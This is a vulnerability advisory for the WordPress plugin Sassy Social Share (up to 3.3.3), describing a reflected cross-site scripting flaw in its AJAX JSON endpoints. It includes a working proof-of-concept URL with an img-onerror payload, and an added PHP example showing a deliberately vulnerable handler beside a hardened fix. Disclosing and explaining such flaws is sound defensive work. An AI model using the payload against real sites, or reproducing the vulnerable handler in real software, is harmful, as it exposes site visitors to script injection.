WordPress Plugin Vulnerabilities
Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS)
Description
The plugin's AJAX endpoints that return JSON data do not set a Content-Type header, so the response falls back to the default text/html. Any HTML contained in the returned JSON is therefore rendered by the browser as HTML, which allows reflected cross-site scripting.
Proof of Concept
PoC URL (uses the unauthenticated action "heateor_sss_sharing_count"):
http://WORDPRESS_DOMAIN_HERE/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]=
Other authenticated AJAX actions may also lead to reflected XSS, but these were not tested.
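To show the root cause and its remediation, here is an added PHP example (not code from the plugin or from the advisory) with two hypothetical WordPress AJAX handlers: one that echoes JSON with no Content-Type header, and a hardened one that uses wp_send_json() so the response is served as application/json. The action and function names are assumptions chosen for the illustration.

```php
<?php
// Added example, not the plugin's code. Two hypothetical unauthenticated
// AJAX handlers that return share counts for URLs passed as array keys in
// $_GET['urls'], mirroring the shape of the PoC request above.

// Vulnerable pattern: the body is JSON, but no Content-Type header is sent,
// so PHP/WordPress default to text/html and the browser parses any markup
// reflected in the keys as HTML. json_encode() does not escape '<' or '>'
// unless JSON_HEX_TAG is passed, so the PoC payload survives intact.
function example_sharing_count_vulnerable() {
    $urls   = isset( $_GET['urls'] ) ? (array) $_GET['urls'] : array();
    $counts = array();
    foreach ( array_keys( $urls ) as $url ) {
        $counts[ $url ] = 0; // placeholder count; key is reflected verbatim
    }
    echo json_encode( $counts ); // no header() call -> text/html
    wp_die();
}
add_action( 'wp_ajax_nopriv_example_sharing_count_vulnerable', 'example_sharing_count_vulnerable' );

// Hardened pattern: wp_send_json() sets "Content-Type: application/json"
// before echoing and then terminates the request, so browsers never render
// the body as a document. Input is also restricted to http(s) URLs, and
// X-Content-Type-Options: nosniff prevents MIME sniffing of the body.
function example_sharing_count_fixed() {
    $raw    = isset( $_GET['urls'] ) ? (array) wp_unslash( $_GET['urls'] ) : array();
    $counts = array();
    foreach ( array_keys( $raw ) as $url ) {
        $url = (string) $url;
        if ( false === filter_var( $url, FILTER_VALIDATE_URL ) ) {
            continue; // not a syntactically valid URL, drop it
        }
        $scheme = strtolower( (string) parse_url( $url, PHP_URL_SCHEME ) );
        if ( ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
            continue; // only http(s) targets are meaningful for share counts
        }
        $counts[ $url ] = 0; // placeholder count
    }
    header( 'X-Content-Type-Options: nosniff' );
    wp_send_json( $counts ); // sends Content-Type: application/json and exits
}
add_action( 'wp_ajax_nopriv_example_sharing_count_fixed', 'example_sharing_count_fixed' );
```

Even with the header fixed, treating the JSON-returning endpoint as data only (fetching it with XMLHttpRequest/fetch rather than navigating to it) and applying a nonce check via check_ajax_referer() where the action does not need to be public further reduces exposure.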
Classification
Type: XSS
Miscellaneous
Original Researcher: Nicholas Mun
Submitter: Nicholas Mun
Verified: No
Timeline
Publicly Published: 2019-11-17
Added: 2019-11-18
Last Updated: 2019-11-25